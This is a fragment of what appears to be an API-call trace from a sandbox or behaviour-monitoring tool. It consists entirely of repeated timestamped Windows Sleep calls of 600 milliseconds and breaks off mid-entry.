[0161.689] Sleep (dwMilliseconds=0x258) [0161.719] Sleep (dwMilliseconds=0x258) [0161.734] Sleep (dwMilliseconds=0x258) [0161.746] Sleep (dwMilliseconds=0x258) [0161.870] Sleep (dwMilliseconds=0x258) [0161.916] Sleep (dwMilliseconds=0x258) [0161.925] Sleep (dwMilliseconds=0x258) [0161.968] Sleep (dwMilliseconds=0x258) [0162.016] Sleep (dwMilliseconds=0x258) [0162.062] Sleep (dwMilliseconds=0x258) [0162.126] Sleep (dwMilliseconds=0x258) [0162.187] Sleep (dwMilliseconds=0x258) [0162.237] Sleep (dwMilliseconds=0x258) [0162.251] Sleep (dwMilliseconds=0x258) [0162.267] Sleep (dwMilliseconds=0x258) [0162.294] Sleep (dwMilliseconds=0x258) [0162.407] Sleep (dwMilliseconds=0x258) [0162.452] Sleep (dwMilliseconds=0x258) [0162.469] Sleep (dwMilliseconds=0x258) [0162.512] Sleep (dwMilliseconds=0x258) [0162.563] Sleep (dwMilliseconds=0x258) [0162.609] Sleep (dwMilliseconds=0x258) [0162.659] Sleep (dwMilliseconds=0x258) [0162.679] Sleep (dwMilliseconds=0x258) [0162.686] Sleep (dwMilliseconds=0x258) [0162.715] Sleep (dwMilliseconds=0x258) [0162.767] Sleep (dwMilliseconds=0x258) [0162.794] Sleep (dwMilliseconds=0x258) [0162.813] Sleep (dwMilliseconds=0x258) [0162.859] Sleep (dwMilliseconds=0x258) [0162.903] Sleep (dwMilliseconds=0x258) [0162.922] Sleep (dwMilliseconds=0x258) [0162.969] Sleep (dwMilliseconds=0x258) [0163.009] Sleep (dwMilliseconds=0x258) [0163.012] Sleep (dwMilliseconds=0x258) [0163.028] Sleep (dwMilliseconds=0x258) [0163.091] Sleep (dwMilliseconds=0x258) [0163.129] Sleep (dwMilliseconds=0x258) [0163.140] Sleep (dwMilliseconds=0x258) [0163.153] Sleep (dwMilliseconds=0x258) [0163.204] Sleep (dwMilliseconds=0x258) [0163.297] Sleep (dwMilliseconds=0x258) [0163.371] Sleep (dwMilliseconds=0x258) [0163.435] Sleep (dwMilliseconds=0x258) [0163.500] Sleep (dwMilliseconds=0x258) [0163.546] Sleep (dwMilliseconds=0x258) [0163.567] Sleep (dwMilliseconds=0x258) [0163.578] Sleep (dwMilliseconds=0x258) [0163.609] Sleep (dwMilliseconds=0x258) [0163.655] Sleep (dwMilliseconds=0x258) [0163.678] Sleep (dwMilliseconds=0x258) [0163.684] Sleep (dwMilliseconds=0x258) [0163.719] Sleep (dwMilliseconds=0x258) [0163.762] Sleep (dwMilliseconds=0x258) [0163.812] Sleep (dwMilliseconds=0x258) [0163.859] Sleep (dwMilliseconds=0x258) [0163.877] Sleep (dwMilliseconds=0x258) [0163.890] Sleep (dwMilliseconds=0x258) [0163.923] Sleep (dwMilliseconds=0x258) [0163.968] Sleep (dwMilliseconds=0x258) [0163.989] Sleep (dwMilliseconds=0x258) [0163.997] Sleep (dwMilliseconds=0x258) [0164.031] Sleep (dwMilliseconds=0x258) [0164.092] Sleep (dwMilliseconds=0x258) [0164.130] Sleep (dwMilliseconds=0x258) [0164.139] Sleep (dwMilliseconds=0x258) [0164.156] Sleep (dwMilliseconds=0x258) [0164.203] Sleep (dwMilliseconds=0x258) [0164.251] Sleep (dwMilliseconds=0x258) [0164.312] Sleep (dwMilliseconds=0x258) [0164.469] Sleep (dwMilliseconds=0x258) [0164.503] Sleep (dwMilliseconds=0x258) [0164.574] Sleep (dwMilliseconds=0x258) [0164.625] Sleep (dwMilliseconds=0x258) [0164.644] Sleep (dwMilliseconds=0x258) [0164.652] Sleep (dwMilliseconds=0x258) [0164.687] Sleep (dwMilliseconds=0x258) [0164.734] Sleep (dwMilliseconds=0x258) [0164.782] Sleep (dwMilliseconds=0x258) [0164.823] Sleep (dwMilliseconds=0x258) [0164.874] Sleep (dwMilliseconds=0x258) [0164.919] Sleep (dwMilliseconds=0x258) [0164.958] Sleep (dwMilliseconds=0x258) [0165.021] Sleep (dwMilliseconds=0x258) [0165.070] Sleep (dwMilliseconds=0x258) [0165.128] Sleep (dwMilliseconds=0x258) [0165.190] Sleep (dwMilliseconds=0x258) [0165.419] Sleep (dwMilliseconds=0x258) [0165.470] Sleep (dwMilliseconds=0x258) [0165.512] Sleep (dwMilliseconds=0x258) [0165.578] Sleep (dwMilliseconds=0x258) [0165.599] Sleep (dwMilliseconds=0x258) [0165.673] Sleep (dwMilliseconds=0x258) [0165.706] Sleep (dwMilliseconds=0x258) [0165.751] Sleep (dwMilliseconds=0x258) [0165.775] Sleep (dwMilliseconds=0x258) [0165.782] Sleep (dwMilliseconds=0x258) [0165.793] Sleep (dwMilliseconds=0x258) [0165.857] Sleep (dwMilliseconds=0x258) [0165.905] Sleep (dwMilliseconds=0x258) [0165.954] Sleep (dwMilliseconds=0x258) [0166.000] Sleep (dwMilliseconds=0x258) [0166.020] Sleep (dwMilliseconds=0x258) [0166.028] Sleep (dwMilliseconds=0x258) [0166.062] Sleep (dwMilliseconds=0x258) [0166.126] Sleep (dwMilliseconds=0x258) [0166.156] Sleep (dwMilliseconds=0x258) [0166.168] Sleep (dwMilliseconds=0x258) [0166.216] Sleep (dwMilliseconds=0x258) [0166.278] Sleep (dwMilliseconds=0x258) [0166.307] Sleep (dwMilliseconds=0x258) [0166.309] Sleep (dwMilliseconds=0x258) [0166.345] Sleep (dwMilliseconds=0x258) [0166.425] Sleep (dwMilliseconds=0x258) [0166.459] Sleep (dwMilliseconds=0x258) [0166.486] Sleep (dwMilliseconds=0x258) [0166.497] Sleep (dwMilliseconds=0x258) [0166.547] Sleep (dwMilliseconds=0x258) [0166.593] Sleep (dwMilliseconds=0x258) [0166.658] Sleep (dwMilliseconds=0x258) [0166.734] Sleep (dwMilliseconds=0x258) [0166.810] Sleep (dwMilliseconds=0x258) [0166.859] Sleep (dwMilliseconds=0x258) [0166.906] Sleep (dwMilliseconds=0x258) [0166.950] Sleep (dwMilliseconds=0x258) [0166.972] Sleep (dwMilliseconds=0x258) [0166.985] Sleep (dwMilliseconds=0x258) [0167.015] Sleep (dwMilliseconds=0x258) [0167.062] Sleep (dwMilliseconds=0x258) [0167.112] Sleep (dwMilliseconds=0x258) [0167.124] Sleep (dwMilliseconds=0x258) [0167.144] Sleep (dwMilliseconds=0x258) [0167.187] Sleep (dwMilliseconds=0x258) [0167.236] Sleep (dwMilliseconds=0x258) [0167.278] Sleep (dwMilliseconds=0x258) [0167.324] Sleep (dwMilliseconds=0x258) [0167.376] Sleep (dwMilliseconds=0x258) [0167.451] Sleep (dwMilliseconds=0x258) [0167.472] Sleep (dwMilliseconds=0x258) [0167.505] Sleep (dwMilliseconds=0x258) [0167.536] Sleep (dwMilliseconds=0x258) [0167.578] Sleep (dwMilliseconds=0x258) [0167.617] Sleep (dwMilliseconds=0x258) [0167.643] Sleep (dwMilliseconds=0x258) [0167.687] Sleep (dwMilliseconds=0x258) [0167.732] Sleep (dwMilliseconds=0x258) [0167.782] Sleep (dwMilliseconds=0x258) [0167.828] Sleep (dwMilliseconds=0x258) [0167.844] Sleep (dwMilliseconds=0x258) [0167.860] Sleep (dwMilliseconds=0x258) [0167.891] Sleep (dwMilliseconds=0x258) [0167.953] Sleep (dwMilliseconds=0x258) [0168.033] Sleep (dwMilliseconds=0x258) [0168.058] Sleep (dwMilliseconds=0x258) [0168.125] Sleep (dwMilliseconds=0x258) [0168.161] Sleep (dwMilliseconds=0x258) [0168.172] Sleep (dwMilliseconds=0x258) [0168.188] Sleep (dwMilliseconds=0x258) [0168.234] Sleep (dwMilliseconds=0x258) [0168.274] Sleep (dwMilliseconds=0x258) [0168.281] Sleep (dwMilliseconds=0x258) [0168.345] Sleep (dwMilliseconds=0x258) [0168.408] Sleep (dwMilliseconds=0x258) [0168.450] Sleep (dwMilliseconds=0x258) [0168.562] Sleep (dwMilliseconds=0x258) [0168.595] Sleep (dwMilliseconds=0x258) [0168.627] Sleep (dwMilliseconds=0x258) [0168.668] Sleep (dwMilliseconds=0x258) [0168.709] Sleep (dwMilliseconds=0x258) [0168.715] Sleep (dwMilliseconds=0x258) [0168.734] Sleep (dwMilliseconds=0x258) [0168.778] Sleep (dwMilliseconds=0x258) [0168.817] Sleep (dwMilliseconds=0x258) [0168.825] Sleep (dwMilliseconds=0x258) [0168.845] Sleep (dwMilliseconds=0x258) [0168.891] Sleep (dwMilliseconds=0x258) [0168.935] Sleep (dwMilliseconds=0x258) [0168.985] Sleep (dwMilliseconds=0x258) [0169.031] Sleep (dwMilliseconds=0x258) [0169.050] Sleep (dwMilliseconds=0x258) [0169.062] Sleep (dwMilliseconds=0x258) [0169.107] Sleep (dwMilliseconds=0x258) [0169.266] Sleep (dwMilliseconds=0x258) [0169.285] Sleep (dwMilliseconds=0x258) [0169.293] Sleep (dwMilliseconds=0x258) [0169.324] Sleep (dwMilliseconds=0x258) [0169.393] Sleep (dwMilliseconds=0x258) [0169.426] Sleep (dwMilliseconds=0x258) [0169.467] Sleep (dwMilliseconds=0x258) [0169.510] Sleep (dwMilliseconds=0x258) [0169.633] Sleep (dwMilliseconds=0x258) [0169.681] Sleep (dwMilliseconds=0x258) [0169.703] Sleep (dwMilliseconds=0x258) [0169.750] Sleep (dwMilliseconds=0x258) [0169.797] Sleep (dwMilliseconds=0x258) [0169.859] Sleep (dwMilliseconds=0x258) [0169.915] Sleep (dwMilliseconds=0x258) [0169.924] Sleep (dwMilliseconds=0x258) [0169.935] Sleep (dwMilliseconds=0x258) [0169.965] Sleep (dwMilliseconds=0x258) [0170.017] Sleep (dwMilliseconds=0x258) [0170.048] Sleep (dwMilliseconds=0x258) [0170.063] Sleep (dwMilliseconds=0x258) [0170.082] Sleep (dwMilliseconds=0x258) [0170.142] Sleep (dwMilliseconds=0x258) [0170.199] Sleep (dwMilliseconds=0x258) [0170.266] Sleep (dwMilliseconds=0x258) [0170.377] Sleep (dwMilliseconds=0x258) [0170.437] Sleep (dwMilliseconds=0x258) [0170.493] Sleep (dwMilliseconds=0x258) [0170.499] Sleep (dwMilliseconds=0x258) [0170.543] Sleep (dwMilliseconds=0x258) [0170.638] Sleep (dwMilliseconds=0x258) [0170.688] Sleep (dwMilliseconds=0x258) [0170.751] Sleep (dwMilliseconds=0x258) [0170.812] Sleep (dwMilliseconds=0x258) [0170.879] Sleep (dwMilliseconds=0x258) [0170.942] Sleep (dwMilliseconds=0x258) [0170.986] Sleep (dwMilliseconds=0x258) [0171.028] Sleep (dwMilliseconds=0x258) [0171.057] Sleep (dwMilliseconds=0x258) [0171.060] Sleep (dwMilliseconds=0x258) [0171.083] Sleep (dwMilliseconds=0x258) [0171.169] Sleep (dwMilliseconds=0x258) [0171.235] Sleep (dwMilliseconds=0x258) [0171.246] Sleep (dwMilliseconds=0x258) [0171.298] Sleep (dwMilliseconds=0x258) [0171.343] Sleep (dwMilliseconds=0x258) [0171.391] Sleep (dwMilliseconds=0x258) [0171.437] Sleep (dwMilliseconds=0x258) [0171.462] Sleep (dwMilliseconds=0x258) [0171.467] Sleep (dwMilliseconds=0x258) [0171.485] Sleep (dwMilliseconds=0x258) [0171.531] Sleep (dwMilliseconds=0x258) [0171.702] Sleep (dwMilliseconds=0x258) [0171.718] Sleep (dwMilliseconds=0x258) [0171.820] Sleep (dwMilliseconds=0x258) [0171.900] Sleep (dwMilliseconds=0x258) [0171.996] Sleep (dwMilliseconds=0x258) [0172.077] Sleep (dwMilliseconds=0x258) [0172.187] Sleep (dwMilliseconds=0x258) [0172.264] Sleep (dwMilliseconds=0x258) [0172.358] Sleep (dwMilliseconds=0x258) [0172.444] Sleep (dwMilliseconds=0x258) [0172.462] Sleep (dwMilliseconds=0x258) [0172.483] Sleep (dwMilliseconds=0x258) [0172.563] Sleep (dwMilliseconds=0x258) [0172.609] Sleep (dwMilliseconds=0x258) [0172.630] Sleep (dwMilliseconds=0x258) [0172.720] Sleep (dwMilliseconds=0x258) [0172.830] Sleep (dwMilliseconds=0x258) [0172.872] Sleep (dwMilliseconds=0x258) [0172.900] Sleep (dwMilliseconds=0x258) [0172.903] Sleep (dwMilliseconds=0x258) [0172.922] Sleep (dwMilliseconds=0x258) [0172.983] Sleep (dwMilliseconds=0x258) [0173.016] Sleep (dwMilliseconds=0x258) [0173.030] Sleep (dwMilliseconds=0x258) [0173.047] Sleep (dwMilliseconds=0x258) [0173.090] Sleep (dwMilliseconds=0x258) [0173.150] Sleep (dwMilliseconds=0x258) [0173.154] Sleep (dwMilliseconds=0x258) [0173.480] Sleep (dwMilliseconds=0x258) [0173.756] Sleep (dwMilliseconds=0x258) [0173.926] Sleep (dwMilliseconds=0x258) [0174.040] Sleep (dwMilliseconds=0x258) [0174.095] Sleep (dwMilliseconds=0x258) [0174.157] Sleep (dwMilliseconds=0x258) [0174.192] Sleep (dwMilliseconds=0x258) [0174.199] Sleep (dwMilliseconds=0x258) [0174.219] Sleep (dwMilliseconds=0x258) [0174.265] Sleep (dwMilliseconds=0x258) [0174.313] Sleep (dwMilliseconds=0x258) [0174.360] Sleep (dwMilliseconds=0x258) [0174.406] Sleep (dwMilliseconds=0x258) [0174.435] Sleep (dwMilliseconds=0x258) [0174.454] Sleep (dwMilliseconds=0x258) [0174.500] Sleep (dwMilliseconds=0x258) [0174.548] Sleep (dwMilliseconds=0x258) [0174.561] Sleep (dwMilliseconds=0x258) [0174.610] Sleep (dwMilliseconds=0x258) [0174.670] Sleep (dwMilliseconds=0x258) [0174.750] Sleep (dwMilliseconds=0x258) [0174.797] Sleep (dwMilliseconds=0x258) [0174.860] Sleep (dwMilliseconds=0x258) [0174.900] Sleep (dwMilliseconds=0x258) [0174.903] Sleep (dwMilliseconds=0x258) [0174.921] Sleep (dwMilliseconds=0x258) [0174.970] Sleep (dwMilliseconds=0x258) [0174.994] Sleep (dwMilliseconds=0x258) [0174.997] Sleep (dwMilliseconds=0x258) [0175.014] Sleep (dwMilliseconds=0x258) [0175.063] Sleep (dwMilliseconds=0x258) [0175.083] Sleep (dwMilliseconds=0x258) [0175.093] Sleep (dwMilliseconds=0x258) [0175.265] Sleep (dwMilliseconds=0x258) [0175.360] Sleep (dwMilliseconds=0x258) [0175.425] Sleep (dwMilliseconds=0x258) [0175.931] Sleep (dwMilliseconds=0x258) [0176.002] Sleep (dwMilliseconds=0x258) [0176.075] Sleep (dwMilliseconds=0x258) [0176.160] Sleep (dwMilliseconds=0x258) [0176.262] Sleep (dwMilliseconds=0x258) [0176.524] Sleep (dwMilliseconds=0x258) [0176.580] Sleep (dwMilliseconds=0x258) [0176.613] Sleep (dwMilliseconds=0x258) [0176.658] Sleep (dwMilliseconds=0x258) [0176.685] Sleep (dwMilliseconds=0x258) [0176.766] Sleep (dwMilliseconds=0x258) [0176.841] Sleep (dwMilliseconds=0x258) [0176.923] Sleep (dwMilliseconds=0x258) [0176.997] Sleep (dwMilliseconds=0x258) [0177.062] Sleep (dwMilliseconds=0x258) [0177.124] Sleep (dwMilliseconds=0x258) [0177.159] Sleep (dwMilliseconds=0x258) [0177.223] Sleep (dwMilliseconds=0x258) [0177.363] Sleep (dwMilliseconds=0x258) [0177.391] Sleep (dwMilliseconds=0x258) [0177.409] Sleep (dwMilliseconds=0x258) [0177.438] Sleep (dwMilliseconds=0x258) [0177.547] Sleep (dwMilliseconds=0x258) [0177.565] Sleep (dwMilliseconds=0x258) [0177.578] Sleep (dwMilliseconds=0x258) [0177.611] Sleep (dwMilliseconds=0x258) [0177.659] Sleep (dwMilliseconds=0x258) [0177.677] Sleep (dwMilliseconds=0x258) [0177.703] Sleep (dwMilliseconds=0x258) [0177.731] Sleep (dwMilliseconds=0x258) [0177.781] Sleep (dwMilliseconds=0x258) [0177.828] Sleep (dwMilliseconds=0x258) [0177.876] Sleep (dwMilliseconds=0x258) [0177.889] Sleep (dwMilliseconds=0x258) [0177.906] Sleep (dwMilliseconds=0x258) [0177.952] Sleep (dwMilliseconds=0x258) [0178.000] Sleep (dwMilliseconds=0x258) [0178.049] Sleep (dwMilliseconds=0x258) [0178.095] Sleep (dwMilliseconds=0x258) [0178.136] Sleep (dwMilliseconds=0x258) [0178.158] Sleep (dwMilliseconds=0x258) [0178.203] Sleep (dwMilliseconds=0x258) [0178.250] Sleep (dwMilliseconds=0x258) [0178.312] Sleep (dwMilliseconds=0x258) [0178.640] Sleep (dwMilliseconds=0x258) [0178.802] Sleep (dwMilliseconds=0x258) [0178.812] Sleep (dwMilliseconds=0x258) [0178.825] Sleep (dwMilliseconds=0x258) [0178.875] Sleep (dwMilliseconds=0x258) [0178.908] Sleep (dwMilliseconds=0x258) [0178.922] Sleep (dwMilliseconds=0x258) [0178.937] Sleep (dwMilliseconds=0x258) [0178.984] Sleep (dwMilliseconds=0x258) [0179.017] Sleep (dwMilliseconds=0x258) [0179.032] Sleep (dwMilliseconds=0x258) [0179.047] Sleep (dwMilliseconds=0x258) [0179.095] Sleep (dwMilliseconds=0x258) [0179.156] Sleep (dwMilliseconds=0x258) [0179.220] Sleep (dwMilliseconds=0x258) [0179.419] Sleep (dwMilliseconds=0x258) [0179.483] Sleep (dwMilliseconds=0x258) [0179.516] Sleep (dwMilliseconds=0x258) [0179.580] Sleep (dwMilliseconds=0x258) [0179.610] Sleep (dwMilliseconds=0x258) [0179.623] Sleep (dwMilliseconds=0x258) [0179.646] Sleep (dwMilliseconds=0x258) [0179.704] Sleep (dwMilliseconds=0x258) [0179.763] Sleep (dwMilliseconds=0x258) [0179.785] Sleep (dwMilliseconds=0x258) [0179.825] Sleep (dwMilliseconds=0x258) [0179.876] Sleep (dwMilliseconds=0x258) [0179.918] Sleep (dwMilliseconds=0x258) [0179.970] Sleep (dwMilliseconds=0x258) [0179.995] Sleep (dwMilliseconds=0x258) [0180.016] Sleep (dwMilliseconds=0x258) [0180.062] Sleep (dwMilliseconds=0x258) [0180.089] Sleep (dwMilliseconds=0x258) [0180.116] Sleep (dwMilliseconds=0x258) [0180.174] Sleep (dwMilliseconds=0x258) [0180.216] Sleep (dwMilliseconds=0x258) [0180.251] Sleep (dwMilliseconds=0x258) [0180.297] Sleep (dwMilliseconds=0x258) [0180.332] Sleep (dwMilliseconds=0x258) [0180.342] Sleep (dwMilliseconds=0x258) [0180.438] Sleep (dwMilliseconds=0x258) [0180.482] Sleep (dwMilliseconds=0x258) [0180.547] Sleep (dwMilliseconds=0x258) [0180.593] Sleep (dwMilliseconds=0x258) [0180.613] Sleep (dwMilliseconds=0x258) [0180.624] Sleep (dwMilliseconds=0x258) [0180.657] Sleep (dwMilliseconds=0x258) [0180.719] Sleep (dwMilliseconds=0x258) [0180.752] Sleep (dwMilliseconds=0x258) [0180.762] Sleep (dwMilliseconds=0x258) [0180.781] Sleep (dwMilliseconds=0x258) [0180.829] Sleep (dwMilliseconds=0x258) [0180.860] Sleep (dwMilliseconds=0x258) [0180.874] Sleep (dwMilliseconds=0x258) [0180.890] Sleep (dwMilliseconds=0x258) [0180.939] Sleep (dwMilliseconds=0x258) [0180.972] Sleep (dwMilliseconds=0x258) [0180.983] Sleep (dwMilliseconds=0x258) [0181.000] Sleep (dwMilliseconds=0x258) [0181.315] Sleep (dwMilliseconds=0x258) [0181.374] Sleep (dwMilliseconds=0x258) [0181.418] Sleep (dwMilliseconds=0x258) [0181.528] Sleep (dwMilliseconds=0x258) [0181.565] Sleep (dwMilliseconds=0x258) [0181.600] Sleep (dwMilliseconds=0x258) [0181.744] Sleep (dwMilliseconds=0x258) [0181.777] Sleep (dwMilliseconds=0x258) [0181.844] Sleep (dwMilliseconds=0x258) [0181.921] Sleep (dwMilliseconds=0x258) [0181.969] Sleep (dwMilliseconds=0x258) [0182.031] Sleep (dwMilliseconds=0x258) [0182.096] Sleep (dwMilliseconds=0x258) [0182.157] Sleep (dwMilliseconds=0x258) [0182.200] Sleep (dwMilliseconds=0x258) [0182.297] Sleep (dwMilliseconds=0x258) [0182.343] Sleep (dwMilliseconds=0x258) [0182.407] Sleep (dwMilliseconds=0x258) [0182.450] Sleep (dwMilliseconds=0x258) [0182.480] Sleep (dwMilliseconds=0x258) [0182.562] Sleep (dwMilliseconds=0x258) [0182.609] Sleep (dwMilliseconds=0x258) [0182.652] Sleep (dwMilliseconds=0x258) [0182.669] Sleep (dwMilliseconds=0x258) [0182.719] Sleep (dwMilliseconds=0x258) [0182.766] Sleep (dwMilliseconds=0x258) [0182.790] Sleep (dwMilliseconds=0x258) [0182.799] Sleep (dwMilliseconds=0x258) [0182.841] Sleep (dwMilliseconds=0x258) [0182.891] Sleep (dwMilliseconds=0x258) [0182.903] Sleep (dwMilliseconds=0x258) [0182.957] Sleep (dwMilliseconds=0x258) [0183.000] Sleep (dwMilliseconds=0x258) [0183.047] Sleep (dwMilliseconds=0x258) [0183.093] Sleep (dwMilliseconds=0x258) [0183.138] Sleep (dwMilliseconds=0x258) [0183.171] Sleep (dwMilliseconds=0x258) [0183.221] Sleep (dwMilliseconds=0x258) [0183.244] Sleep (dwMilliseconds=0x258) [0183.247] Sleep (dwMilliseconds=0x258) [0183.281] Sleep (dwMilliseconds=0x258) [0183.329] Sleep (dwMilliseconds=0x258) [0183.356] Sleep (dwMilliseconds=0x258) [0183.376] Sleep (dwMilliseconds=0x258) [0183.481] Sleep (dwMilliseconds=0x258) [0183.548] Sleep (dwMilliseconds=0x258) [0183.561] Sleep (dwMilliseconds=0x258) [0183.581] Sleep (dwMilliseconds=0x258) [0183.625] Sleep (dwMilliseconds=0x258) [0183.658] Sleep (dwMilliseconds=0x258) [0183.674] Sleep (dwMilliseconds=0x258) [0183.701] Sleep (dwMilliseconds=0x258) [0183.751] Sleep (dwMilliseconds=0x258) [0183.787] Sleep (dwMilliseconds=0x258) [0183.793] Sleep (dwMilliseconds=0x258) [0183.812] Sleep (dwMilliseconds=0x258) [0183.859] Sleep (dwMilliseconds=0x258) [0183.896] Sleep (dwMilliseconds=0x258) [0183.903] Sleep (dwMilliseconds=0x258) [0183.923] Sleep (dwMilliseconds=0x258) [0183.970] Sleep (dwMilliseconds=0x258) [0184.016] Sleep (dwMilliseconds=0x258) [0184.079] Sleep (dwMilliseconds=0x258) [0184.141] Sleep (dwMilliseconds=0x258) [0184.188] Sleep (dwMilliseconds=0x258) [0184.232] Sleep (dwMilliseconds=0x258) [0184.281] Sleep (dwMilliseconds=0x258) [0184.295] Sleep (dwMilliseconds=0x258) [0184.313] Sleep (dwMilliseconds=0x258) [0184.360] Sleep (dwMilliseconds=0x258) [0184.390] Sleep (dwMilliseconds=0x258) [0184.406] Sleep (dwMilliseconds=0x258) [0184.421] Sleep (dwMilliseconds=0x258) [0184.552] Sleep (dwMilliseconds=0x258) [0184.588] Sleep (dwMilliseconds=0x258) [0184.590] Sleep (dwMilliseconds=0x258) [0184.611] Sleep (dwMilliseconds=0x258) [0184.675] Sleep (dwMilliseconds=0x258) [0184.701] Sleep (dwMilliseconds=0x258) [0184.733] Sleep (dwMilliseconds=0x258) [0184.781] Sleep (dwMilliseconds=0x258) [0184.796] Sleep (dwMilliseconds=0x258) [0184.812] Sleep (dwMilliseconds=0x258) [0184.856] Sleep (dwMilliseconds=0x258) [0184.902] Sleep (dwMilliseconds=0x258) [0184.950] Sleep (dwMilliseconds=0x258) [0184.990] Sleep (dwMilliseconds=0x258) [0184.996] Sleep (dwMilliseconds=0x258) [0185.063] Sleep (dwMilliseconds=0x258) [0185.092] Sleep (dwMilliseconds=0x258) [0185.116] Sleep (dwMilliseconds=0x258) [0185.171] Sleep (dwMilliseconds=0x258) [0185.221] Sleep (dwMilliseconds=0x258) [0185.234] Sleep (dwMilliseconds=0x258) [0185.253] Sleep (dwMilliseconds=0x258) [0185.297] Sleep (dwMilliseconds=0x258) [0185.341] Sleep (dwMilliseconds=0x258) [0185.395] Sleep (dwMilliseconds=0x258) [0185.443] Sleep (dwMilliseconds=0x258) [0185.449] Sleep (dwMilliseconds=0x258) [0185.517] Sleep (dwMilliseconds=0x258) [0185.596] Sleep (dwMilliseconds=0x258) [0185.610] Sleep (dwMilliseconds=0x258) [0185.633] Sleep (dwMilliseconds=0x258) [0185.688] Sleep (dwMilliseconds=0x258) [0185.737] Sleep (dwMilliseconds=0x258) [0185.750] Sleep (dwMilliseconds=0x258) [0185.798] Sleep (dwMilliseconds=0x258) [0185.844] Sleep (dwMilliseconds=0x258) [0185.913] Sleep (dwMilliseconds=0x258) [0185.970] Sleep (dwMilliseconds=0x258) [0185.995] Sleep (dwMilliseconds=0x258) [0186.031] Sleep (dwMilliseconds=0x258) [0186.079] Sleep (dwMilliseconds=0x258) [0186.130] Sleep (dwMilliseconds=0x258) [0186.137] Sleep (dwMilliseconds=0x258) [0186.188] Sleep (dwMilliseconds=0x258) [0186.242] Sleep (dwMilliseconds=0x258) [0186.247] Sleep (dwMilliseconds=0x258) [0186.299] Sleep (dwMilliseconds=0x258) [0186.365] Sleep (dwMilliseconds=0x258) [0186.375] Sleep (dwMilliseconds=0x258) [0186.454] Sleep (dwMilliseconds=0x258) [0186.497] Sleep (dwMilliseconds=0x258) [0186.563] Sleep (dwMilliseconds=0x258) [0186.700] Sleep (dwMilliseconds=0x258) [0186.725] Sleep (dwMilliseconds=0x258) [0186.731] Sleep (dwMilliseconds=0x258) [0186.767] Sleep (dwMilliseconds=0x258) [0186.812] Sleep (dwMilliseconds=0x258) [0186.858] Sleep (dwMilliseconds=0x258) [0186.906] Sleep (dwMilliseconds=0x258) [0186.953] Sleep (dwMilliseconds=0x258) [0186.968] Sleep (dwMilliseconds=0x258) [0187.192] Sleep (dwMilliseconds=0x258) [0187.256] Sleep (dwMilliseconds=0x258) [0187.300] Sleep (dwMilliseconds=0x258) [0187.360] Sleep (dwMilliseconds=0x258) [0187.417] Sleep (dwMilliseconds=0x258) [0187.439] Sleep (dwMilliseconds=0x258) [0187.452] Sleep (dwMilliseconds=0x258) [0187.534] Sleep (dwMilliseconds=0x258) [0187.681] Sleep (dwMilliseconds=0x258) [0187.718] Sleep (dwMilliseconds=0x258) [0187.734] Sleep (dwMilliseconds=0x258) [0187.782] Sleep (dwMilliseconds=0x258) [0187.810] Sleep (dwMilliseconds=0x258) [0187.828] Sleep (dwMilliseconds=0x258) [0187.874] Sleep (dwMilliseconds=0x258) [0187.904] Sleep (dwMilliseconds=0x258) [0187.921] Sleep (dwMilliseconds=0x258) [0187.986] Sleep (dwMilliseconds=0x258) [0188.013] Sleep (dwMilliseconds=0x258) [0188.033] Sleep (dwMilliseconds=0x258) [0188.074] Sleep (dwMilliseconds=0x258) [0188.122] Sleep (dwMilliseconds=0x258) [0188.140] Sleep (dwMilliseconds=0x258) [0188.234] Sleep (dwMilliseconds=0x258) [0188.257] Sleep (dwMilliseconds=0x258) [0188.262] Sleep (dwMilliseconds=0x258) [0188.281] Sleep (dwMilliseconds=0x258) [0188.328] Sleep (dwMilliseconds=0x258) [0188.347] Sleep (dwMilliseconds=0x258) [0188.359] Sleep (dwMilliseconds=0x258) [0188.403] Sleep (dwMilliseconds=0x258) [0188.453] Sleep (dwMilliseconds=0x258) [0188.466] Sleep (dwMilliseconds=0x258) [0188.485] Sleep (dwMilliseconds=0x258) [0188.514] Sleep (dwMilliseconds=0x258) [0188.562] Sleep (dwMilliseconds=0x258) [0188.600] Sleep (dwMilliseconds=0x258) [0188.641] Sleep (dwMilliseconds=0x258) [0188.672] Sleep (dwMilliseconds=0x258) [0188.719] Sleep (dwMilliseconds=0x258) [0188.732] Sleep (dwMilliseconds=0x258) [0188.750] Sleep (dwMilliseconds=0x258) [0188.794] Sleep (dwMilliseconds=0x258) [0188.837] Sleep (dwMilliseconds=0x258) [0188.840] Sleep (dwMilliseconds=0x258) [0188.891] Sleep (dwMilliseconds=0x258) [0188.924] Sleep (dwMilliseconds=0x258) [0188.946] Sleep (dwMilliseconds=0x258) [0188.985] Sleep (dwMilliseconds=0x258) [0189.035] Sleep (dwMilliseconds=0x258) [0189.262] Sleep (dwMilliseconds=0x258) [0189.344] Sleep (dwMilliseconds=0x258) [0189.496] Sleep (dwMilliseconds=0x258) [0189.567] Sleep (dwMilliseconds=0x258) [0189.610] Sleep (dwMilliseconds=0x258) [0189.726] Sleep (dwMilliseconds=0x258) [0189.743] Sleep (dwMilliseconds=0x258) [0189.747] Sleep (dwMilliseconds=0x258) [0189.778] Sleep (dwMilliseconds=0x258) [0189.824] Sleep (dwMilliseconds=0x258) [0189.876] Sleep (dwMilliseconds=0x258) [0189.930] Sleep (dwMilliseconds=0x258) [0189.936] Sleep (dwMilliseconds=0x258) [0189.950] Sleep (dwMilliseconds=0x258) [0190.000] Sleep (dwMilliseconds=0x258) [0190.045] Sleep (dwMilliseconds=0x258) [0190.062] Sleep (dwMilliseconds=0x258) [0190.117] Sleep (dwMilliseconds=0x258) [0190.156] Sleep (dwMilliseconds=0x258) [0190.172] Sleep (dwMilliseconds=0x258) [0190.187] Sleep (dwMilliseconds=0x258) [0190.236] Sleep (dwMilliseconds=0x258) [0190.256] Sleep (dwMilliseconds=0x258) [0190.263] Sleep (dwMilliseconds=0x258) [0190.280] Sleep (dwMilliseconds=0x258) [0190.329] Sleep (dwMilliseconds=0x258) [0190.352] Sleep (dwMilliseconds=0x258) [0190.356] Sleep (dwMilliseconds=0x258) [0190.374] Sleep (dwMilliseconds=0x258) [0190.424] Sleep (dwMilliseconds=0x258) [0190.441] Sleep (dwMilliseconds=0x258) [0190.450] Sleep (dwMilliseconds=0x258) [0190.510] Sleep (dwMilliseconds=0x258) [0190.563] Sleep (dwMilliseconds=0x258) [0190.595] Sleep (dwMilliseconds=0x258) [0190.606] Sleep (dwMilliseconds=0x258) [0190.627] Sleep (dwMilliseconds=0x258) [0190.671] Sleep (dwMilliseconds=0x258) [0190.770] Sleep (dwMilliseconds=0x258) [0190.777] Sleep 